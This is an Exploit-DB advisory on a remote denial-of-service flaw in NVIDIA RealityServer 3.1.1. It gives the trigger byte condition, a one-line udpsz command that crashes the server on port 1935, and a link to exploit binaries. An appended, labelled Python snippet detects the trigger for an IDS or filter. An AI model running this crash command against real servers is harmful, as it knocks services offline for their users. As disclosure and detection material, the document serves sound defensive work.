RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service

EDB-ID: 35895
CVE: N/A
Platform: Windows
Date: 2011-06-28


source: https://www.securityfocus.com/bid/48476/info

RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.

Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.

RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip




#######################################################################

                             Luigi Auriemma

Application:  NVIDIA RealityServer
              http://www.realityserver.com/products/realityserver.html
              http://www.nvidia.com/object/realityserver.html
Versions:     <= 3.1.1 build 144525.5057
Platforms:    Windows and Linux
Bug:          NULL pointer
Exploitation: remote, versus server
Date:         27 Jun 2011 (found and reported on my forum 04 Dec 2010)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"The RealityServer® platform is a powerful combination of NVIDIA®
Tesla® GPUs and 3D web services software that delivers interactive,
photorealistic applications over the web, enabling product designers,
architects and consumers to easily visualize 3D scenes with remarkable
realism."


#######################################################################

======
2) Bug
======


If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
NULL pointer dereference.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

  udpsz -C 03 -b 0xff -T SERVER 1935 0xc02


#######################################################################

======
4) Fix
======


No fix.
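
Added example (not part of the original advisory or the author's code): with no fix listed, this is a stateful check an inline filter or IDS could apply for the condition in section 2. It assumes offset 0xc01 is counted from the first byte of the client-to-server TCP stream on port 1935; the class, function names and sample streams are constructed for illustration.

```python
TRIGGER_OFFSET = 0xC01  # offset given in section 2 of the advisory
TRIGGER_MIN = 0x80      # byte values >= 0x80 lead to the NULL pointer dereference


class RtmpStreamCheck:
    """State for one client-to-server TCP stream (assumed offset base: byte 0)."""

    def __init__(self):
        self.seen = 0        # bytes consumed so far
        self.verdict = None  # None = undecided, True = trigger, False = clean

    def feed(self, segment: bytes):
        """Consume the next in-order payload and return the verdict once known."""
        if self.verdict is None:
            idx = TRIGGER_OFFSET - self.seen
            if 0 <= idx < len(segment):
                self.verdict = segment[idx] >= TRIGGER_MIN
            self.seen += len(segment)
        return self.verdict


def check_stream(segments):
    """Return True (trigger byte), False (byte < 0x80) or None (stream too short)."""
    state = RtmpStreamCheck()
    for seg in segments:
        if state.feed(seg) is not None:
            break
    return state.verdict


def sample_stream(byte_at_offset: int) -> bytes:
    """Constructed 0xc02-byte stream: 0x03, zero padding, then the byte under test."""
    return bytes([0x03]) + bytes(TRIGGER_OFFSET - 1) + bytes([byte_at_offset])


def split_segments(data: bytes, mss: int = 1460):
    """Cut a stream into MSS-sized pieces, as TCP segmentation would."""
    return [data[i:i + mss] for i in range(0, len(data), mss)]


if __name__ == "__main__":
    for value in (0x7F, 0x80):
        verdict = check_stream(split_segments(sample_stream(value)))
        print(f"byte 0x{value:02x} at 0x{TRIGGER_OFFSET:x}: trigger={verdict}")
```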


#######################################################################